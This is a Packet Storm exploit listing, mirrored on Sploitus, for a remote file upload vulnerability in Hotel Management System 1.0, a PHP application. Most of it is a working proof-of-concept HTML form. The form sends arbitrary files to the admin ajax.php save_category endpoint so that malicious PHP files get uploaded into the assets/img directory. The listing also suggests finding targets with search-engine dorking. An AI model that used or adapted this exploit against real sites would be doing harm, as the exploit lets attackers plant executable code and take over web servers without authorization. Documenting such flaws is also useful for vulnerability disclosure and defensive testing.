Share
## https://sploitus.com/exploit?id=PACKETSTORM:180099
=============================================================================================================================================  
| # Title : Hotel Management System 1.0 Remote File Upload Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |  
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel-management-system-using-php.zip |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] This HTML page is designed to remotely upload malicious PHP files directly.  
  
[+] Line 23 set url of target.  
  
[+] The path to upload the files : http://127.0.0.1/hotel/assets/img/  
  
[+] Save Code as html :  
  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title>Category Management</title>  
</head>  
<body>  
<div class="container-fluid">  
<form id="manage-category" enctype="multipart/form-data">  
<input type="hidden" name="id">   
<div class="form-group">  
<label for="img" class="control-label">Ev!L Image</label>  
<input type="file" name="img" id="img" class="form-control form-control-sm rounded-0" accept="image/*" onchange="displayImg(this, $(this))">  
</div>  
<button type="submit" class="btn btn-primary">Send</button>  
</form>  
</div>  
</tbody>  
</table>  
</div>  
  
<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>  
<script>  
function displayImg(input, _this) {  
if (input.files && input.files[0]) {  
var reader = new FileReader();  
reader.onload = function (e) {  
$('#cimg').attr('src', e.target.result);  
}  
reader.readAsDataURL(input.files[0]);  
}  
}  
  
$('#manage-category').submit(function(e){  
e.preventDefault();  
$.ajax({  
url: 'http://127.0.0.1/hotel/admin/ajax.php?action=save_category',  
data: new FormData($(this)[0]),  
cache: false,  
contentType: false,  
processData: false,  
method: 'POST',  
type: 'POST',  
success: function(resp){  
if (resp == 1) {  
alert("Data successfully added");  
setTimeout(function(){  
location.reload();  
}, 1500);  
  
}  
}  
});  
});  
  
$('.edit_cat').click(function(){  
var cat = $('#manage-category');  
cat.get(0).reset();  
$('#cimg').attr('src', '../assets/img/' + $(this).attr('data-cover_img'));  
});  
  
</script>  
</body>  
</html>  
  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================